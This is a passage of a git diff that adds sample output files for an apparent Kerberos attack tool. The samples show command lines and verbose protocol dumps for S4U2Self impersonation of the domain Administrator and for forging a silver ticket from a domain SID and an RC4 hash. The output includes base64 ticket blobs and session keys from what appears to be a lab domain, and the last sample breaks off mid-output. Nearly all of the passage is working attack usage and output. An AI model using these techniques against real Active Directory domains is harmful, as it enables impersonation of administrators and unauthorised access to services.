NQXihDxsNQ09SUExBQi5MT0NBTKIaMBigAwIBCqERMA8bDWFkbWluaXN0cmF0b3KjBwMFAEClAAClERgPMjAyMDA1MjcwODM5MTVaphEYDzIwMjAwNTI3MTgzOTE1WqcRGA8yMDIwMDYwMzA4MzkxNVqoDxsNQ09SUExBQi5MT0NBTKkkMCKgAwIBAqEbMBkbBGxkYXAbEWRjMS5jb3JwbGFiLmxvY2Fs
+[+] Done! Now enjoy your ticket for ldap/dc1.corplab.local.
+```
\ No newline at end of file
diff --git a/Authentication/Samples/S4U2Self.md b/Authentication/Samples/S4U2Self.md
new file mode 100644
index 0000000..c505d72
--- /dev/null
+++ b/Authentication/Samples/S4U2Self.md
@@ -0,0 +1,387 @@
+```powershell
+PS C:\Users> .\KerberosRun.exe --s4u2self --user spnuseraes --pass [...] --impersonateuser administrator --verbose
+
+   __           __
+  / /_____ ____/ /  ___ _______  ___ ______ _____
+ /  '_/ -_) __/ _ \/ -_) __/ _ \(_-</ __/ // / _ \
+/_/\_\\__/_/ /_.__/\__/_/  \___/___/_/  \_,_/_//_/
+
+  v1.0.0
+[*] Starting Kerberos Authentication ...
+[*] Sending AS-REQ ...
+    * MessageType :  KRB_AS_REQ
+    * pvno :  5
+    * PaData :
+       - PA_PAC_REQUEST :
+          - IncludePac :  True
+    * Body :
+       - KdcOptions :  RenewableOk, Canonicalize, Renewable, Forwardable
+       - CName :
+          - Type :  NT_PRINCIPAL
+          - Name :  spnuseraes
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Type :  NT_SRV_INST
+          - Name :  krbtgt
+          - Name :  CORPLAB.LOCAL
+       - Till :  9/13/2037 2:48:05 AM +00:00
+       - RTime :  9/13/2037 2:48:05 AM +00:00
+       - Nonce :  637261655
+       - EType :
+          - EncType :  AES256_CTS_HMAC_SHA1_96
+          - EncType :  AES128_CTS_HMAC_SHA1_96
+          - EncType :  RC4_HMAC_NT
+          - EncType :  RC4_HMAC_NT_EXP
+          - EncType :  RC4_HMAC_OLD_EXP
+       - Addresses :
+          - Type :  NetBios
+          - Addresses :  ADMINSTAT
+       - AdditionalTickets :
+       - EncAuthorizationData :
+       - From :
+[x] Kerberos Error: KDC KDC_ERR_PREAUTH_REQUIRED: Additional pre-authentication required
+[*] Adding encrypted timestamp ...
+[*] Sending AS-REQ ...
+    * MessageType :  KRB_AS_REQ
+    * pvno :  5
+    * PaData :
+       - PA_PAC_REQUEST :
+          - IncludePac :  True
+       - PA_ENC_TIMESTAMP :
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - kvno :
+          - Cipher :  [ClientEncryptedTimestamp...]
+          - PaTimestamp :  5/27/2020 8:36:56 AM +00:00
+          - PaUSec :  76
+    * Body :
+       - KdcOptions :  RenewableOk, Canonicalize, Renewable, Forwardable
+       - CName :
+          - Type :  NT_PRINCIPAL
+          - Name :  spnuseraes
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Type :  NT_SRV_INST
+          - Name :  krbtgt
+          - Name :  CORPLAB.LOCAL
+       - Till :  9/13/2037 2:48:05 AM +00:00
+       - RTime :  9/13/2037 2:48:05 AM +00:00
+       - Nonce :  637261656
+       - EType :
+          - EncType :  AES256_CTS_HMAC_SHA1_96
+          - EncType :  AES128_CTS_HMAC_SHA1_96
+          - EncType :  RC4_HMAC_NT
+          - EncType :  RC4_HMAC_NT_EXP
+          - EncType :  RC4_HMAC_OLD_EXP
+       - Addresses :
+          - Type :  NetBios
+          - Addresses :  ADMINSTAT
+       - AdditionalTickets :
+       - EncAuthorizationData :
+       - From :
+[*] Receiving AS-REP...
+    * MessageType :  KRB_AS_REP
+    * pvno :  5
+    * PaData :
+       - PA_ETYPE_INFO2 :
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - S2kParams :
+          - Salt :  CORPLAB.LOCALspnuseraes
+    * CRealm :  CORPLAB.LOCAL
+    * CName :
+       - Type :  NT_PRINCIPAL
+       - Name :  spnuseraes
+    * Ticket :
+       - tkt-vno :  5
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Name :  krbtgt
+          - Type :  NT_SRV_INST
+       - EncryptedPart :
+          - kvno :  11
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - Cipher :  [krbtgtEncryptedCipher...]
+    * Enc-Part :
+       - kvno :  4
+       - EType :  AES256_CTS_HMAC_SHA1_96
+       - Cipher :  [ClientEncryptedCipher...]
+    * [Decrypted Enc-Part]:
+       - AuthTime :  5/27/2020 8:36:56 AM +00:00
+       - StartTime :  5/27/2020 8:36:56 AM +00:00
+       - EndTime :  5/27/2020 6:36:56 PM +00:00
+       - RenewTill :  6/3/2020 8:36:56 AM +00:00
+       - Nonce :  637261656
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Type :  NT_SRV_INST
+          - Name :  krbtgt
+          - Name :  CORPLAB.LOCAL
+       - EncryptedPaData :
+          - PA_SUPPORTED_ETYPES :
+             - Value : 1F000000
+       - Key :
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - Value :  1E157E1731C7A3A6DB4E7B459BFE28A455F3F6D63A8D32C85E5D2A7AB41D676A
+       - KeyExpiration :  9/14/2037 2:48:05 AM +00:00
+       - CAddr :
+          - Type :  NetBios
+          - Addresses :  ADMINSTAT
+       - Flags :  EncryptedPreAuthentication, PreAuthenticated, Initial, Renewable, Forwardable
+       - LastReq
+          - Type :  0
+          - Type :  5/27/2020 8:36:56 AM +00:00
+[+] TGT Kirbi:
+    - doIFHDCCBRigAwIBBaEDAgEWooIEHDCCBBhhggQUMIIEEKADAgEFoQ8bDUNPUlBMQUIuTE9DQUyiIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDUNPUlBMQUIuTE9DQUyjggPSMIIDzqADAgESoQMCAQuiggPABIIDvIP+Zn69tXQECp4jl9hp0dj63afUgjqFNbsvTLLLSDRg8C2Xs2AFxObuYtmRkajj6SHgt5b8mMJrLmgrYdvVKxPxxXO7ePBMPsWVpcGAhX8w1pzhrjShR7nVD4EjsVb3adD83mV3MseBtK9OezsSiVl6WmcfHiIwW3ORIFVanijfUv+IPdFrtzrcKIK4BEO/CyhSV0A/o5TD8vQBPSOXzgLnmCSV4Jrl31/CrS/nVIyQINnXNxD8JnwcDEF9oNWUu833BSZT3hOP2bRA1bePh6fxUsR1RpEsXvMIeo8XZWlianxcri8uQun2kZEQgBDu8HJqQ/DX+7FyI4YP3cAMljYKc4Owv+rVWN4bp9HTP41Ryvvn3SFOBcvKPNkv8nyc+t3mep0YdXPOhV3h4RaVwFRGieD2BLOc9no4PPQE50ucAG7bM93xS4+svEIKrqxaMSImrRqLRIbS6bzV4GVi0nLheFsYIKlTLtdGKf0w5t+U9Dy8r0QzkVWy5RhM06fyIukAHCZkuB8ehlvNDUvg9fJNxYlVFge3Y+VtvBqE/RuARCPj70ibUTelyg2SA5V8B4gEWKtoP+MLRTEsKATsc1CHkSTegdIwb8Dx1+dsdqY6hzYrrH0+CQKdAECM+yOaFnd4YaaHV70+tdoDjch6EX9cMsKsb1swVWd3Bqsyc5hQkGnsLPMw1loCsq5ofbJkpYqd0YdD8NtLelH+ZwXwABBm7IIjBjGNtTv1OvzWpPKjtfRSgzGfDMacRHvsNZpYn8ckxCEuye0oMgRJACSmbKRIUjyrDbr+CadHcP/lzztNpNzU3GLJIMS/XUL74yB5knPSs4DA4dQ9qyutLKVbxqtiGtIuX2/1nGe6iWzlaNrHATgM8as1QmSJ7MVQH6CgJefeUDVPUx+8/W0VP5kPAqglDAVSZ3QOEHHRplj6+8vZ85nwdwL13g1uZKRX7hMSkhDrbAb0lPf/vFRo7tva5JScxa9BP3BGddEhXr2sBxyH7OHJ4PkKDzqpPiCmi+t6E8WHq8kcMQ8WTNJEeWuP1yAOuUyX4ROv0XSuyn4xamBe7XNVt6OaSHGO815xwhlg6gMelnjUQy67blEDUPdNaqGMzIFmg/KK178QZJh0mEknh18Hm6NpoXgsgBkF67m3jwTiKhT+0Zq2TW8jKyaKiQJ+gfeGDMExgRZ3SrAmeOw3V0ZeHGQ3PFxkBj9Hc7q/aKywy9FhdLM7ckxY/2x/wbcQK7YsSrcMzRK6KRlk/2qHErNAJiG/aKta+JRBo4HrMIHooAMCAQCigeAEgd19gdowgdeggdQwgdEwgc6gKzApoAMCARKhIgQgHhV+FzHHo6bbTntFm/4opFXz9tY6jTLIXl0qerQdZ2qhDxsNQ09SUExBQi5MT0NBTKIXMBWgAwIBAaEOMAwbCnNwbnVzZXJhZXOjBwMFAEDhAAClERgPMjAyMDA1MjcwODM2NTZaphEYDzIwMjAwNTI3MTgzNjU2WqcRGA8yMDIwMDYwMzA4MzY1NlqoDxsNQ09SUExBQi5MT0NBTKkiMCCgAwIBAqEZMBcbBmtyYnRndBsNQ09SUExBQi5MT0NBTA==
+[*] Sending TGS-REQ [S4U2Self] ...
+    * MessageType :  KRB_TGS_REQ
+    * pvno :  5
+    * PaData :
+       - PA_TGS_REQ :
+          - KRB_AP_REQ :
+             - pvno :  5
+             - ApOptions :  Reserved
+             - Ticket :
+                - tkt-vno :  5
+                - Realm :  CORPLAB.LOCAL
+                - SName :
+                   - Type :  NT_SRV_INST
+                   - Name :  krbtgt
+                   - Name :  CORPLAB.LOCAL
+                - EncryptedPart :
+                   - kvno :  11
+                   - EType :  AES256_CTS_HMAC_SHA1_96
+                   - Cipher :  [krbtgtEncryptedCipher...]
+             - Authenticator :
+                - kvno :
+                - EType :  AES256_CTS_HMAC_SHA1_96
+                - Realm :  CORPLAB.LOCAL
+                - SequenceNumber :  637261658
+                - Subkey :
+                   - EType :  AES256_CTS_HMAC_SHA1_96
+                   - KeyValue :  161C88517AAF9648A4AA42143C992F5E3F4D6A465AEF90FE69B472BBCE676416
+                - CTime :  5/27/2020 8:36:56 AM +00:00
+                - CuSec :  326
+                - CName :
+                   - Type :  NT_PRINCIPAL
+                   - Name :  spnuseraes
+                - Checksum :
+                   - Type :  HMAC_SHA1_96_AES256
+                   - Checksum :  B277A4DEB00C649EC6C8735F
+                - AuthorizationData :
+                - AuthenticatorVersionNumber :  5
+       - PA_FOR_USER :
+          - UserName :
+             - Type :  NT_ENTERPRISE
+             - Name :  administrator@corplab.local
+          - UserRealm :  CORPLAB.LOCAL
+          - AuthPackage :  Kerberos
+          - Checksum :
+             - Type :  KERB_CHECKSUM_HMAC_MD5
+             - Checksum :  6ED520CA9B16AA5573A1C10F1C9D7B16
+    * Body :
+       - KdcOptions :  EncTktInSkey, RenewableOk, Renewable, Forwardable
+       - Realm :  corplab.local
+       - SName :
+          - Type :  NT_PRINCIPAL
+          - Name :  spnuseraes
+       - Till :  9/13/2037 2:48:05 AM +00:00
+       - RTime :
+       - Nonce :  637261657
+       - EType :
+          - EncType :  AES256_CTS_HMAC_SHA1_96
+          - EncType :  AES128_CTS_HMAC_SHA1_96
+          - EncType :  RC4_HMAC_NT
+          - EncType :  RC4_HMAC_NT_EXP
+          - EncType :  RC4_HMAC_OLD_EXP
+       - EncAuthorizationData :
+       - From :
+       - AdditionalTickets :
+[*] Receiving TGS-REP [S4U2Self] ...
+    * MessageType :  KRB_TGS_REP
+    * pvno :  5
+    * PaData :
+    * CRealm :  CORPLAB.LOCAL
+    * CName :
+       - Type :  NT_ENTERPRISE
+       - Name :  administrator@corplab.local
+    * Ticket :
+       - tkt-vno :  5
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Name :  spnuseraes
+          - Type :  NT_PRINCIPAL
+       - EncryptedPart :
+          - kvno :  4
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - Cipher :  [ServiceEncryptedCipher...]
+    * Enc-Part :
+       - EType :  AES256_CTS_HMAC_SHA1_96
+       - kvno :
+       - Cipher :  [SubSessionKeyEncryptedCipher..]
+    * [Decrypted Enc-Part]:
+       - AuthTime :  5/27/2020 8:36:56 AM +00:00
+       - StartTime :  5/27/2020 8:36:56 AM +00:00
+       - EndTime :  5/27/2020 6:36:56 PM +00:00
+       - RenewTill :  6/3/2020 8:36:56 AM +00:00
+       - Nonce :  637261657
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Type :  NT_PRINCIPAL
+          - Name :  spnuseraes
+       - EncryptedPaData :
+       - Key :
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - Value :  7127CB38BD4F7C5A8FDA1FA3D3083A16A4E3259A7DCC9245EED09FF61CF79B3B
+       - KeyExpiration :
+       - Flags :  EncryptedPreAuthentication, PreAuthenticated, Renewable
+       - LastReq
+          - Type :  0
+          - Type :  5/27/2020 8:36:56 AM +00:00
+    * [Decrypted Ticket Enc-Part]:
+       - AuthTime :  5/27/2020 8:36:56 AM +00:00
+       - StartTime :  5/27/2020 8:36:56 AM +00:00
+       - EndTime :  5/27/2020 6:36:56 PM +00:00
+       - RenewTill :  6/3/2020 8:36:56 AM +00:00
+       - CRealm :  CORPLAB.LOCAL
+       - CName :
+          - Type :  NT_ENTERPRISE
+          - Name :  administrator@corplab.local
+       - AuthorizationData :
+          - Type :  AdIfRelevant
+             - Type :  AdWin2kPac
+                - Type :  AdWin2kPac
+                - Version :  0
+                - LogonInfo :
+                   - PacType :
+                   - DomainId :
+                      - Revision :  1
+                      - IdentifierAuthority :  NTAuthority
+                      - SubAuthority :  21, 1977317821, 1772133574, 954835042
+                      - SubAuthorityCount :  4
+                   - ExtraIds :
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - Sid :  S-1-18-2
+                      - Revision :  1
+                      - IdentifierAuthority :  AuthenticationAuthority
+                      - SubAuthority :  2
+                      - SubAuthorityCount :  1
+                   - DomainSid :
+                      - Attributes :  0
+                      - Id :  954835042
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042
+                   - ExtraSidCount :  1
+                   - ExtraSids :
+                      - Id :  2
+                      - Attributes :  0
+                      - Value :  S-1-18-2
+                   - GroupCount :  5
+                   - GroupId :  513
+                   - GroupIds :
+                      - RelativeId :  512
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - RelativeId :  513
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - RelativeId :  520
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - RelativeId :  518
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - RelativeId :  519
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                   - GroupSid :  S-1-5-21-1977317821-1772133574-954835042-513
+                   - GroupSids :
+                      - Id :  512
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-512
+                      - Id :  513
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-513
+                      - Id :  520
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-520
+                      - Id :  518
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-518
+                      - Id :  519
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-519
+                   - HomeDirectory :
+                   - HomeDrive :
+                   - KickOffTime :  1/1/0001 12:00:00 AM +00:00
+                   - LastFailedILogon :  1/1/1601 12:00:00 AM +00:00
+                   - LastSuccessfulILogon :  1/1/1601 12:00:00 AM +00:00
+                   - LogoffTime :  1/1/0001 12:00:00 AM +00:00
+                   - LogonCount :  144
+                   - LogonScript :
+                   - LogonTime :  5/27/2020 8:09:42 AM +00:00
+                   - ProfilePath :
+                   - PwdCanChangeTime :  5/20/2020 3:37:53 AM +00:00
+                   - PwdLastChangeTime :  5/19/2020 3:37:53 AM +00:00
+                   - PwdMustChangeTime :  1/1/0001 12:00:00 AM +00:00
+                   - Reserved1 :  0, 0
+                   - Reserved3 :  0
+                   - ResourceDomainId :  S-1-5-21-1977317821-1772133574-954835042
+                   - ResourceDomainSid :  S-1-5-21-1977317821-1772133574-954835042
+                   - ResourceGroupCount :  1
+                   - ResourceGroupIds :  System.Collections.Generic.List`1[Kerberos.NET.Entities.Pac.GroupMembership]
+                   - ResourceGroups :
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_RESOURCE
+                      - Id :  572
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-572
+                   - SubAuthStatus :  0
+                   - UserAccountControl :  ADS_UF_LOCKOUT
+                   - UserDisplayName :
+                   - UserFlags :  LOGON_EXTRA_SIDS, LOGON_RESOURCE_GROUPS
+                   - UserId :  500
+                   - UserName :  Administrator
+                   - UserSessionKey :  00000000000000000000000000000000
+                   - UserSid :  S-1-5-21-1977317821-1772133574-954835042-500
+                   - DomainName :  CORP
+                   - ServerName :  DC1
+                   - BadPasswordCount :  0
+                   - FailedILogonCount :  0
+                - ClientInformation :
+                   - PacType :  CLIENT_NAME_TICKET_INFO
+                   - ClientId :  5/27/2020 8:36:56 AM +00:00
+                   - Name :  administrator@corplab.local
+                   - NameLength :  54
+                - KdcSignature :
+                   - PacType :  0
+                   - RODCIdentifier :  0
+                   - Signature :  017B1F728AF1BEDBE18785DA
+                   - SignatureData :  [...]
+                   - Type :  HMAC_SHA1_96_AES256
+                   - Validated :  False
+                   - Validator :
+                      - Validator :  PaForUserChecksum
+                      - Validator :  017B1F728AF1BEDBE18785DA
+                - ServerSignature :
+                   - PacType :  0
+                   - RODCIdentifier :  0
+                   - Signature :  7049AB64FE5D686544A3C6A4
+                   - SignatureData :  [...]
+                   - Type :  HMAC_SHA1_96_AES256
+                   - Validated :  False
+                   - Validator :
+                      - Validator :  PaForUserChecksum
+                      - Validator :  7049AB64FE5D686544A3C6A4
+                - UpnDomainInformation :
+                   - PacType :  UPN_DOMAIN_INFO
+                   - Upn :  Administrator@corplab.local
+                   - UpnLength :  54
+                   - UpnOffset :  16
+                   - Domain :  CORPLAB.LOCAL
+                   - DnsDomainNameLength :  26
+                   - DnsDomainNameOffset :  72
+                - DecodingErrors :
+                - HasRequiredFields :  True
+       - CAddr :
+       - Flags :  EncryptedPreAuthentication, PreAuthenticated, Renewable
+       - Key :
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - Value :  7127CB38BD4F7C5A8FDA1FA3D3083A16A4E3259A7DCC9245EED09FF61CF79B3B
+       - Transited :
+          - Type :  DomainX500Compress
+          - Contents :
+[+] TGS Kirbi:
+    - doIFoDCCBZygAwIBBaEDAgEWooIEmjCCBJZhggSSMIIEjqADAgEFoQ8bDUNPUlBMQUIuTE9DQUyiFzAVoAMCAQGhDjAMGwpzcG51c2VyYWVzo4IEWzCCBFegAwIBEqEDAgEEooIESQSCBEUUm2ueUzGCM3SzR4vsQOS2hDmgWEhPBj3EXAtgbECZrqbt1T64jEvpVFL+CcV8hC2tPnLJa5Pq7Hn66d9iReGsG6zsjW73P5pc0VMjGsKknHgchF1i4zrlp+FX+EJW7/WcswcUuBwrsggSS9b+tJtSt7/GLdwxcxKogNibIIWnSwkJ5dy4IuutrnbFK1mgNR14vkaxlHkFMwzUsEWRPx1AjY2UqOfN0tP6NNFJH9KA7/lA7MPXruJ8TGGV56NkWUgfRIiRvVAYR/L2BjEnu6KKBKgg9jWNPtu6epNuI4rY8SvXLK9GjdJrloxQW+ooereVUrCq5+cEwkmTcQeotLEd0Fsv3DYVkK8iVPSGsA0mHKW7GbiWhGYVmhEbHp3YHhFNcUpqg1ul48fU8qh9af8y2KFHmMRvtEhISgCmu5o6s+bKd/a2w7CUIpDxrhnd2qSixm2/wVExMsWBIyI2HxfexKiZONd+cOusHDulR+GjYECzuNRyllqu62Js9E8AYrKM/R9z5LZqZFqy3IX1szQAWJK3ecbK5nP1lji6lVX4mLtcjbe9vfGj3XVl9L9nPa5IHa1ljb/8zZ36uhaWl2JPKIIVg8w4ZObkB7nwjc+5MghsQzHPE57BYdJpB10ITHnKUMo19/C7MgJgbcR0O+Rz2DwfGKE/4kMnAPfLuVeuWNc8sNgJm8ew3Oh4iIEkzwtjmzrEdVzVJJ1fgxnaEqyH4JYoTQ9x9f3ojaIvNLs5gIZ3EUtrWOR0/ZKvylX7icOTSJi2x7SJcMyf0oLhCeY4BAb9FoPh7C8cF9jguE1VzrvzF8xwP7NIOXnlDb3A4Nwoygm4AfmFSLhTt7eytBKemmZJAudBf40VsjAokNj7ebm9iIckh4NlYDeJnt0AhrdYL+AJo6Q4K4H48bMuoIPdZ5+jw2jz/99gJPxqCnCMMPdTYDn6phXJ94KrFNThqr9pj1AI3nezWrkhV/pBmRyUnsSDgOdO8wVvXnJg4TMK2mBsCFR8rffZEGD/o2IEADYmzW7pMZRhmgFIJX78w8lBGPM2GzQWYqolNCCOKp7+42exY14DjMDLckIa2W2pQE8smbJD6T0SiU9a4w8q4r7CfPyOzGfUiTRiHkWcoNcpS4IeBVVPe+1b1k5fWe/al86BDzn+DcG8FSsm5EYHE91jkwaUS6DPN94R4rVHdk+jr+EhaEyksCeAoXpemPZOxiUyum78pp1hf02FW7gyKJshru6RtHCIr6JUN5/b0JY1vxZwa6Y31hp2AH2uS6NbE4UE/1huNNwbdUNQK3D0IEfEGxSZ9xghAvIvT7ouMFYOo3CyE7lW7IQd6TKaXhsEuB1CYdic86WBUhuxUGNCHwmDzH5SqFdZRoln7ISibJjPY6nvv4H0TdJgnNKwksV6d5NtQCgf3lhx998JwictjCVUlrJZBz69RGf+MaK9suaLXYhqvvXZo4HxMIHuoAMCAQCigeYEgeN9geAwgd2ggdowgdcwgdSgKzApoAMCARKhIgQgcSfLOL1PfFqP2h+j0wg6FqTjJZp9zJJF7tCf9hz3mzuhDxsNQ09SUExBQi5MT0NBTKIoMCagAwIBCqEfMB0bG2FkbWluaXN0cmF0b3JAY29ycGxhYi5sb2NhbKMHAwUAAKEAAKURGA8yMDIwMDUyNzA4MzY1NlqmERgPMjAyMDA1MjcxODM2NTZapxEYDzIwMjAwNjAzMDgzNjU2WqgPGw1DT1JQTEFCLkxPQ0FMqRcwFaADAgEBoQ4wDBsKc3BudXNlcmFlcw==
+[+] Done! Now enjoy your ticket.
+```
\ No newline at end of file
diff --git a/Authentication/Samples/Sliver.md b/Authentication/Samples/Sliver.md
new file mode 100644
index 0000000..3234293
--- /dev/null
+++ b/Authentication/Samples/Sliver.md
@@ -0,0 +1,168 @@
+```powershell
+PS C:\Users> .\KerberosRun.exe --Sliver --domainsid  S-1-5-21-1977317821-1772133574-954835042 --rc4 [...] --service ldap --host dc1$ --user adminuser --domain corplab.local --verbose                                                                                                   
+   __           __
+  / /_____ ____/ /  ___ _______  ___ ______ _____
+ /  '_/ -_) __/ _ \/ -_) __/ _ \(_-</ __/ // / _ \
+/_/\_\\__/_/ /_.__/\__/_/  \___/___/_/  \_,_/_//_/
+
+  v1.0.0
+
+[*] Building Sliver Ticket ...
+[*] Building PAC ...
+   * [Decrypted SliverTicket Ticket]:
+       - AuthTime :  5/27/2020 8:40:47 AM +00:00
+       - StartTime :  5/27/2020 8:40:47 AM +00:00
+       - EndTime :  5/27/2020 6:40:47 PM +00:00
+       - RenewTill :  6/3/2020 8:40:47 AM +00:00
+       - CRealm :  corplab.local
+       - CName :
+          - Type :  NT_PRINCIPAL
+          - Name :  adminuser
+       - AuthorizationData :
+          - Type :  AdIfRelevant
+             - Type :  AdWin2kPac
+                - Type :  AdWin2kPac
+                - Version :  0
+                - LogonInfo :
+                   - PacType :
+                   - DomainId :
+                      - Revision :  1
+                      - IdentifierAuthority :  NTAuthority
+                      - SubAuthority :  21, 1977317821, 1772133574, 954835042
+                      - SubAuthorityCount :  4
+                   - ExtraIds :
+                   - DomainSid :
+                      - Attributes :  0
+                      - Id :  954835042
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042
+                   - ExtraSidCount :  0
+                   - ExtraSids :
+                   - GroupCount :  5
+                   - GroupId :  513
+                   - GroupIds :
+                      - RelativeId :  513
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_OWNER, SE_GROUP_INTEGRITY, SE_GROUP_INTEGRITY_ENABLED, SE_GROUP_RESOURCE, SE_GROUP_LOGON_ID
+                      - RelativeId :  512
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_OWNER, SE_GROUP_INTEGRITY, SE_GROUP_INTEGRITY_ENABLED, SE_GROUP_RESOURCE, SE_GROUP_LOGON_ID
+                      - RelativeId :  520
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_OWNER, SE_GROUP_INTEGRITY, SE_GROUP_INTEGRITY_ENABLED, SE_GROUP_RESOURCE, SE_GROUP_LOGON_ID
+                      - RelativeId :  518
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_OWNER, SE_GROUP_INTEGRITY, SE_GROUP_INTEGRITY_ENABLED, SE_GROUP_RESOURCE, SE_GROUP_LOGON_ID
+                      - RelativeId :  519
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_OWNER, SE_GROUP_INTEGRITY, SE_GROUP_INTEGRITY_ENABLED, SE_GROUP_RESOURCE, SE_GROUP_LOGON_ID
+                   - GroupSid :  S-1-5-21-1977317821-1772133574-954835042-513
+                   - GroupSids :
+                      - Id :  513
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_OWNER, SE_GROUP_INTEGRITY, SE_GROUP_INTEGRITY_ENABLED, SE_GROUP_RESOURCE, SE_GROUP_LOGON_ID
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-513
+                      - Id :  512
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_OWNER, SE_GROUP_INTEGRITY, SE_GROUP_INTEGRITY_ENABLED, SE_GROUP_RESOURCE, SE_GROUP_LOGON_ID
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-512
+                      - Id :  520
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_OWNER, SE_GROUP_INTEGRITY, SE_GROUP_INTEGRITY_ENABLED, SE_GROUP_RESOURCE, SE_GROUP_LOGON_ID
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-520
+                      - Id :  518
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_OWNER, SE_GROUP_INTEGRITY, SE_GROUP_INTEGRITY_ENABLED, SE_GROUP_RESOURCE, SE_GROUP_LOGON_ID
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-518
+                      - Id :  519
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED, SE_GROUP_OWNER, SE_GROUP_INTEGRITY, SE_GROUP_INTEGRITY_ENABLED, SE_GROUP_RESOURCE, SE_GROUP_LOGON_ID
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-519
+                   - HomeDirectory :
+                   - HomeDrive :
+                   - KickOffTime :  1/1/0001 12:00:00 AM +00:00
+                   - LastFailedILogon :  1/1/1601 8:00:00 PM +00:00
+                   - LastSuccessfulILogon :  1/1/1601 8:00:00 PM +00:00
+                   - LogoffTime :  1/1/0001 12:00:00 AM +00:00
+                   - LogonCount :  0
+                   - LogonScript :
+                   - LogonTime :  5/27/2020 8:40:47 AM +00:00
+                   - ProfilePath :
+                   - PwdCanChangeTime :  1/1/0001 12:00:00 AM +00:00
+                   - PwdLastChangeTime :  1/1/0001 12:00:00 AM +00:00
+                   - PwdMustChangeTime :  1/1/0001 12:00:00 AM +00:00
+                   - Reserved1 :  0, 0
+                   - Reserved3 :  0
+                   - ResourceDomainId :
+                   - ResourceDomainSid :
+                   - ResourceGroupCount :  0
+                   - ResourceGroupIds :
+                   - ResourceGroups :
+                   - SubAuthStatus :  0
+                   - UserAccountControl :  ADS_UF_LOCKOUT, ADS_UF_NORMAL_ACCOUNT
+                   - UserDisplayName :
+                   - UserFlags :  LOGON_EXTRA_SIDS
+                   - UserId :  500
+                   - UserName :  adminuser
+                   - UserSessionKey :  00000000000000000000000000000000
+                   - UserSid :  S-1-5-21-1977317821-1772133574-954835042-500
+                   - DomainName :  CORPLAB.LOCAL
+                   - ServerName :
+                   - BadPasswordCount :  0
+                   - FailedILogonCount :  0
+                - ClientInformation :
+                   - PacType :  CLIENT_NAME_TICKET_INFO
+                   - ClientId :  5/27/2020 8:40:47 AM +00:00
+                   - Name :  adminuser
+                   - NameLength :  18
